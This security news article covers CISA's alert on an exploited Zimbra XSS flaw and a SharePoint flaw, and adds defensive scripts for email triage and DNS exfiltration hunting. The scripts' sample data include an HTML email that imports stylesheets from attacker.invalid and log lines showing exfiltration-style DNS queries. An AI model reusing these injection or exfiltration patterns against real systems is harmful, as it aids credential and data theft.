CISA Alerts on Active Exploitation of Zimbra and SharePoint Vulnerabilities
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog and urged federal agencies and other organizations to patch them: a stored cross-site scripting flaw in Synacor's Zimbra Collaboration Suite (ZCS) and a deserialization flaw in Microsoft Office SharePoint. Successful exploitation gives an attacker unauthorized access to the affected system, and the Zimbra flaw has already been used to steal credentials and mailbox data.
Details of the Vulnerabilities:
1. Zimbra Collaboration Suite (ZCS) Vulnerability (CVE-2025-66376):
– Severity: Rated at 7.2 on the CVSS scale.
– Description: A stored cross-site scripting (XSS) vulnerability in the Classic UI of ZCS. The attacker embeds a malicious Cascading Style Sheets (CSS) @import directive in the HTML body of an email; when the recipient opens that email in a vulnerable ZCS Classic UI webmail session, the injected content is rendered inside the victim's authenticated session. No attachment or link has to be opened.
– Patch Information: Zimbra fixed the issue in ZCS 10.0.18 and 10.1.13, released in November 2025. Administrators can confirm the installed release by running zmcontrol -v as the zimbra user.
2. Microsoft Office SharePoint Vulnerability (CVE-2026-20963):
– Severity: Rated at 8.8 on the CVSS scale.
– Description: A deserialization-of-untrusted-data flaw that lets an unauthorized attacker execute arbitrary code over the network on an affected SharePoint server.
– Patch Information: Microsoft released a fix for this flaw in January 2026.
Exploitation in the Wild:
The inclusion of CVE-2025-66376 in CISA's Known Exploited Vulnerabilities (KEV) catalog follows a report from cybersecurity firm Seqrite Labs on a campaign, dubbed Operation GhostMail, that targeted Ukraine's State Hydrographic Service. The attackers sent socially engineered emails carrying no malicious attachment or link; instead, the HTML body contained an obfuscated JavaScript payload that exploited the ZCS vulnerability as soon as the message was opened. The payload harvested credentials, session tokens, two-factor authentication recovery codes, browser-saved passwords, and the previous 90 days of mailbox contents, and exfiltrated the data over DNS and HTTPS.
Public details of how CVE-2026-20963 is being exploited remain scarce, but remote code execution by an unauthorized attacker on a SharePoint server is severe enough that patching should not wait for them.
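The GhostMail emails carried no link or attachment; the dangerous content was a CSS @import directive and obfuscated script in the HTML body itself. The following triage scanner, an added example that is neither Zimbra's code nor anything from the Seqrite report, shows how a mail gateway or incident responder can flag those two ingredients in a raw message before it reaches a vulnerable Classic UI session. The sample message, the attacker.invalid URLs and the quarantine rule are constructed for this example; the CSS-escape and comment normalization is there because those are standard ways to hide a keyword from a naive string match.

```python
"""Triage scanner for inbound HTML e-mail: flags CSS @import directives and
inline <script> tags.

Added example; not Zimbra's code and not the GhostMail payload. The sample
message and the attacker.invalid URLs are constructed for this example.
"""
import email
import re
from email import policy

# Constructed sample message: a stylesheet @import, a second @import hidden in
# a style attribute, and an inline script. Nothing here is real attack content.
SAMPLE_EMAIL = b"""From: sender@example.invalid
To: victim@example.invalid
Subject: Invoice 2026-03
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><head>
<style>
  @import url("https://attacker.invalid/x.css");
  body { font-family: sans-serif; }
</style>
</head><body>
<div style="color: red; @import 'https://attacker.invalid/y.css'">Hello</div>
<script>var a = 1;</script>
</body></html>
"""

# CSS lets authors hide keywords behind hex escapes (\69mport) and comments
# (@im/**/port); undo both before matching so simple obfuscation is not enough.
CSS_ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?")
CSS_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
# An @import directive runs to the next ';', '}', newline or tag delimiter.
IMPORT_RE = re.compile(r"@\s*import\b[^;}\n<>]*", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def _unescape(m):
    cp = int(m.group(1), 16)
    return chr(cp) if cp <= 0x10FFFF else "\ufffd"


def normalize_css(text: str) -> str:
    """Strip CSS comments and decode hex escapes so keywords read as written.

    Used for matching only; the rewritten text is never sent onward."""
    return CSS_ESCAPE_RE.sub(_unescape, CSS_COMMENT_RE.sub("", text))


def scan_html(html: str) -> dict:
    """Return the @import directives found and the number of <script> tags."""
    normalized = normalize_css(html)
    return {
        "imports": [m.group(0).strip() for m in IMPORT_RE.finditer(normalized)],
        "scripts": len(SCRIPT_RE.findall(normalized)),
    }


def scan_message(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message and scan every text/html part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    result = {"imports": [], "scripts": 0}
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            found = scan_html(part.get_content())
            result["imports"].extend(found["imports"])
            result["scripts"] += found["scripts"]
    return result


def should_quarantine(raw: bytes) -> bool:
    """Gateway rule (constructed for this example): hold any HTML mail that
    carries an @import directive or an inline script. Defence in depth only;
    the vulnerable handling lives in ZCS Classic UI and needs the patch."""
    found = scan_message(raw)
    return bool(found["imports"]) or found["scripts"] > 0


if __name__ == "__main__":
    print(scan_message(SAMPLE_EMAIL))
```

Legitimate newsletters rarely use @import, but they do use inline styles, so the rule above is deliberately narrow: it keys on the directive and on script tags rather than on styling in general. Treat a hit as a reason to hold and inspect the message, not as proof of the GhostMail payload.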
Recommendations:
In response to these active threats, CISA mandates that Federal Civilian Executive Branch (FCEB) agencies:
– For CVE-2025-66376: Apply the necessary patches by April 1, 2026.
– For CVE-2026-20963: Implement the fixes by March 23, 2026.
Organizations are urged to prioritize these updates to mitigate the risk of exploitation.
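Patching closes the entry point, but an organization that ran a vulnerable Classic UI during the campaign window also needs to look for the exfiltration the report describes. The script below is an added example, not part of the Seqrite report and not a GhostMail signature: it scans resolver query logs for the pattern DNS exfiltration leaves behind, many distinct, long, high-entropy subdomain labels under one parent domain. The log format (timestamp, client, query name, record type), the sample lines, the attacker.invalid domain and the thresholds are all constructed assumptions for this example.

```python
"""Hunt for DNS-based exfiltration in resolver query logs.

Added example; not from the Seqrite report and not a signature for GhostMail.
The log format (timestamp client qname qtype), the sample lines and the
thresholds are constructed for this example; attacker.invalid stands in for
an attacker-controlled domain.
"""
from collections import Counter, defaultdict
from math import log2

# Constructed sample: a few ordinary lookups for example.com, then a burst of
# TXT queries whose leftmost label looks like base32-encoded data.
SAMPLE_LOG = """\
2026-03-02T09:58:01Z 10.0.0.5 www.example.com A
2026-03-02T09:58:02Z 10.0.0.5 mail.example.com MX
2026-03-02T09:58:03Z 10.0.0.5 cdn.example.com A
2026-03-02T09:59:10Z 10.0.0.5 abcdefghijklmnopqrstuvwxyz234567.attacker.invalid TXT
2026-03-02T09:59:11Z 10.0.0.5 efghijklmnopqrstuvwxyz234567abcd.attacker.invalid TXT
2026-03-02T09:59:12Z 10.0.0.5 ijklmnopqrstuvwxyz234567abcdefgh.attacker.invalid TXT
2026-03-02T09:59:13Z 10.0.0.5 mnopqrstuvwxyz234567abcdefghijkl.attacker.invalid TXT
2026-03-02T09:59:14Z 10.0.0.5 qrstuvwxyz234567abcdefghijklmnop.attacker.invalid TXT
2026-03-02T09:59:20Z 10.0.0.5 example.com A
"""


def entropy(s: str) -> float:
    """Shannon entropy in bits per character; 0.0 for an empty string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * log2(c / n) for c in Counter(s).values())


def analyze(lines, min_unique=4, min_prefix_len=20, min_entropy=3.0):
    """Group queries by parent domain and flag domains whose subdomain
    prefixes look like encoded data: many distinct, long, high-entropy labels.

    Returns {parent_domain: stats} for the domains that trip every threshold."""
    per_parent = defaultdict(lambda: {"prefixes": set(), "lens": [], "ents": []})
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # blank or malformed line
        qname = fields[2].rstrip(".").lower()
        labels = qname.split(".")
        if len(labels) < 3:
            continue  # bare registrable domain: nothing to encode data in
        # Assumption: parent = last two labels. Production code should use the
        # public suffix list so co.uk-style suffixes are split correctly.
        parent = ".".join(labels[-2:])
        prefix = "".join(labels[:-2])
        bucket = per_parent[parent]
        bucket["prefixes"].add(prefix)
        bucket["lens"].append(len(prefix))
        bucket["ents"].append(entropy(prefix))

    flagged = {}
    for parent, b in per_parent.items():
        n = len(b["lens"])
        stats = {
            "queries": n,
            "unique_prefixes": len(b["prefixes"]),
            "avg_prefix_len": sum(b["lens"]) / n,
            "avg_entropy": sum(b["ents"]) / n,
        }
        if (stats["unique_prefixes"] >= min_unique
                and stats["avg_prefix_len"] >= min_prefix_len
                and stats["avg_entropy"] >= min_entropy):
            flagged[parent] = stats
    return flagged


if __name__ == "__main__":
    for domain, stats in analyze(SAMPLE_LOG.splitlines()).items():
        print(domain, stats)
```

CDNs, anti-spam services and some telemetry agents also generate long hashed labels, so baseline the thresholds against a quiet period before alerting on them, and pivot from any hit to the querying clients and to egress proxy logs, since the same campaign moved data over HTTPS as well.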
Additional Threats:
In a related development, Amazon has disclosed that threat actors associated with the Interlock ransomware have been exploiting a critical vulnerability in Cisco’s firewall management software (CVE-2026-20131, CVSS score: 10.0) since January 26, 2026. This exploitation began over a month before the vulnerability was publicly disclosed, highlighting the urgency for organizations to stay vigilant and proactive in their cybersecurity measures.
Conclusion:
The active exploitation of these vulnerabilities in widely used platforms such as Zimbra and SharePoint is a reminder that mail and collaboration servers are high-value targets. Organizations should apply the patches promptly, monitor for unusual activity such as unexpected DNS or HTTPS traffic from user endpoints, and train employees to report suspicious mail, bearing in mind that the GhostMail messages carried no link or attachment to spot. Timely patching remains the single most effective step for protecting sensitive information and maintaining operational integrity.